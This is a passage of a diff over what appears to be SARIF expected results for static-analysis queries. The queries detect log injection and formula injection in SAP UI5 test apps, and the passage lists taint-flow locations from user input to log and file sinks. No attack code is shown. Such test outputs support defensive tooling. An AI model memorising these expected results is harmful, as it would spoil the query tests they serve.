, true)" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 13, - "startColumn" : 9, - "endColumn" : 37 - } - }, - "message" : { - "text" : "q" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 14, - "startColumn" : 17, - "endColumn" : 18 - } - }, - "message" : { - "text" : "q" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 14, - "startColumn" : 17, - "endColumn" : 24 - } - }, - "message" : { - "text" : "q.query" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 14, - "startColumn" : 17, - "endColumn" : 33 - } - }, - "message" : { - "text" : "q.query.username" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 14, - "startColumn" : 9, - "endColumn" : 33 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 16, - "startColumn" : 26, - "endColumn" : 31 - } - }, - "message" : { - "text" : "value" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 13, - "startColumn" : 23, - "endColumn" : 30 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/ui5-log-injection", - "rule" : { - "id" : "js/ui5-log-injection", - "index" : 3, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 171 - }, - "region" : { - "startLine" : 13, - "startColumn" : 38, - "endColumn" : 56 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "fb0b88ea7a3fc8f1:1", - "primaryLocationStartColumnFingerprint" : "21" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 175 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 172 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 171 - }, - "region" : { - "startLine" : 7, - "startColumn" : 23, - "endColumn" : 38 - } - }, - "message" : { - "text" : "{ type: \"int\" }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 171 - }, - "region" : { - "startLine" : 13, - "startColumn" : 38, - "endColumn" : 56 - } - }, - "message" : { - "text" : "oControl.getText()" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 175 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/ui5-log-injection", - "rule" : { - "id" : "js/ui5-log-injection", - "index" : 3, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." 
- }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 25, - "startColumn" : 26, - "endColumn" : 32 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "191c273ff0751536:1", - "primaryLocationStartColumnFingerprint" : "21" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 21, - "startColumn" : 23, - "endColumn" : 30 - } - }, - "message" : { - "text" : "req.url" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 21, - "startColumn" : 13, - "endColumn" : 37 - } - }, - "message" : { - "text" : "url.par ... 
, true)" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 21, - "startColumn" : 9, - "endColumn" : 37 - } - }, - "message" : { - "text" : "q" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 22, - "startColumn" : 17, - "endColumn" : 18 - } - }, - "message" : { - "text" : "q" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 22, - "startColumn" : 17, - "endColumn" : 24 - } - }, - "message" : { - "text" : "q.query" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 22, - "startColumn" : 17, - "endColumn" : 33 - } - }, - "message" : { - "text" : "q.query.username" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 22, - "startColumn" : 9, - "endColumn" : 33 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 23, - "startColumn" : 39, - "endColumn" : 44 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 23, - "startColumn" : 18, - "endColumn" : 45 - } - }, - "message" : { - "text" : "jQuery. ... (value)" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 23, - "startColumn" : 9, - "endColumn" : 45 - } - }, - "message" : { - "text" : "value1" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 25, - "startColumn" : 26, - "endColumn" : 32 - } - }, - "message" : { - "text" : "value1" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 21, - "startColumn" : 23, - "endColumn" : 30 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/ui5-log-injection", - "rule" : { - "id" : "js/ui5-log-injection", - "index" : 3, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "Log entry depends on a 
[user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 179 - }, - "region" : { - "startLine" : 17, - "startColumn" : 38, - "endColumn" : 47 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "f32b0dcd4573d6a3:1", - "primaryLocationStartColumnFingerprint" : "21" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 184 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 185 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 179 - }, - "region" : { - "startLine" : 8, - "startColumn" : 23, - "endColumn" : 41 - } - }, - "message" : { - "text" : "{ type: \"string\" }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 179 - }, - "region" : { - "startLine" : 
15, - "startColumn" : 29, - "endColumn" : 47 - } - }, - "message" : { - "text" : "oControl.getText()" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 179 - }, - "region" : { - "startLine" : 15, - "startColumn" : 21, - "endColumn" : 47 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 179 - }, - "region" : { - "startLine" : 16, - "startColumn" : 50, - "endColumn" : 55 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 179 - }, - "region" : { - "startLine" : 16, - "startColumn" : 43, - "endColumn" : 56 - } - }, - "message" : { - "text" : "String(value)" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 179 - }, - "region" : { - "startLine" : 16, - "startColumn" : 33, - "endColumn" : 57 - } - }, - "message" : { - "text" : "encodeX ... 
value))" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 179 - }, - "region" : { - "startLine" : 16, - "startColumn" : 21, - "endColumn" : 57 - } - }, - "message" : { - "text" : "sanitized" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 179 - }, - "region" : { - "startLine" : 17, - "startColumn" : 38, - "endColumn" : 47 - } - }, - "message" : { - "text" : "sanitized" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 184 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/ui5-log-injection", - "rule" : { - "id" : "js/ui5-log-injection", - "index" : 3, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." 
- }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 188 - }, - "region" : { - "startLine" : 17, - "startColumn" : 34, - "endColumn" : 39 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "392fd43c95c7be9c:1", - "primaryLocationStartColumnFingerprint" : "21" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 192 - }, - "region" : { - "startLine" : 6, - "startColumn" : 5, - "endLine" : 8, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 188 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 188 - }, - "region" : { - "startLine" : 15, - "startColumn" : 25, - "endColumn" : 53 - } - }, - "message" : { - "text" : "oModel. ... 
input')" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 188 - }, - "region" : { - "startLine" : 15, - "startColumn" : 17, - "endColumn" : 53 - } - }, - "message" : { - "text" : "input" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 188 - }, - "region" : { - "startLine" : 17, - "startColumn" : 34, - "endColumn" : 39 - } - }, - "message" : { - "text" : "input" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 192 - }, - "region" : { - "startLine" : 6, - "startColumn" : 5, - "endLine" : 8, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/ui5-log-injection", - "rule" : { - "id" : "js/ui5-log-injection", - "index" : 3, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." 
- }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 197 - }, - "region" : { - "startLine" : 16, - "startColumn" : 30, - "endColumn" : 35 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "27d08bf2c216b384:1", - "primaryLocationStartColumnFingerprint" : "21" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 204 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 197 - }, - "region" : { - "startLine" : 8, - "startColumn" : 11, - "endColumn" : 22 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 197 - }, - "region" : { - "startLine" : 14, - "startColumn" : 21, - "endColumn" : 49 - } - }, - "message" : { - "text" : "oModel. ... 
input\")" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 197 - }, - "region" : { - "startLine" : 14, - "startColumn" : 13, - "endColumn" : 49 - } - }, - "message" : { - "text" : "input" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 197 - }, - "region" : { - "startLine" : 16, - "startColumn" : 30, - "endColumn" : 35 - } - }, - "message" : { - "text" : "input" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 204 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/ui5-log-injection", - "rule" : { - "id" : "js/ui5-log-injection", - "index" : 3, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." 
- }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 206 - }, - "region" : { - "startLine" : 17, - "startColumn" : 34, - "endColumn" : 39 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "392fd43c95c7be9c:1", - "primaryLocationStartColumnFingerprint" : "21" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 209 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 206 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 206 - }, - "region" : { - "startLine" : 15, - "startColumn" : 25, - "endColumn" : 53 - } - }, - "message" : { - "text" : "oModel. ... 
input')" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 206 - }, - "region" : { - "startLine" : 15, - "startColumn" : 17, - "endColumn" : 53 - } - }, - "message" : { - "text" : "input" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 206 - }, - "region" : { - "startLine" : 17, - "startColumn" : 34, - "endColumn" : 39 - } - }, - "message" : { - "text" : "input" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 209 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/ui5-formula-injection", - "rule" : { - "id" : "js/ui5-formula-injection", - "index" : 4, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "The content of a saved file depends on a [user-provided value](1)." 
- }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 145 - }, - "region" : { - "startLine" : 17, - "startColumn" : 27, - "endColumn" : 45 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "41899ff1a967017d:1", - "primaryLocationStartColumnFingerprint" : "10" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 150 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 146 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 145 - }, - "region" : { - "startLine" : 8, - "startColumn" : 23, - "endColumn" : 38 - } - }, - "message" : { - "text" : "{ type: \"int\" }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/control/xss.js", - "uriBaseId" : 
"%SRCROOT%", - "index" : 145 - }, - "region" : { - "startLine" : 17, - "startColumn" : 27, - "endColumn" : 45 - } - }, - "message" : { - "text" : "oControl.getText()" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 150 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/ui5-formula-injection", - "rule" : { - "id" : "js/ui5-formula-injection", - "index" : 4, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "The content of a saved file depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 154 - }, - "region" : { - "startLine" : 23, - "startColumn" : 27, - "endColumn" : 39 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "9afa5fd07ee36af6:1", - "primaryLocationStartColumnFingerprint" : "10" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 159 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 155 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 154 - }, - "region" : { - "startLine" : 9, - "startColumn" : 23, - "endColumn" : 41 - } - }, - "message" : { - "text" : "{ type: \"string\" }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 154 - }, - "region" : { - "startLine" : 15, - "startColumn" : 29, - "endColumn" : 47 - } - }, - "message" : { - "text" : "oControl.getText()" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 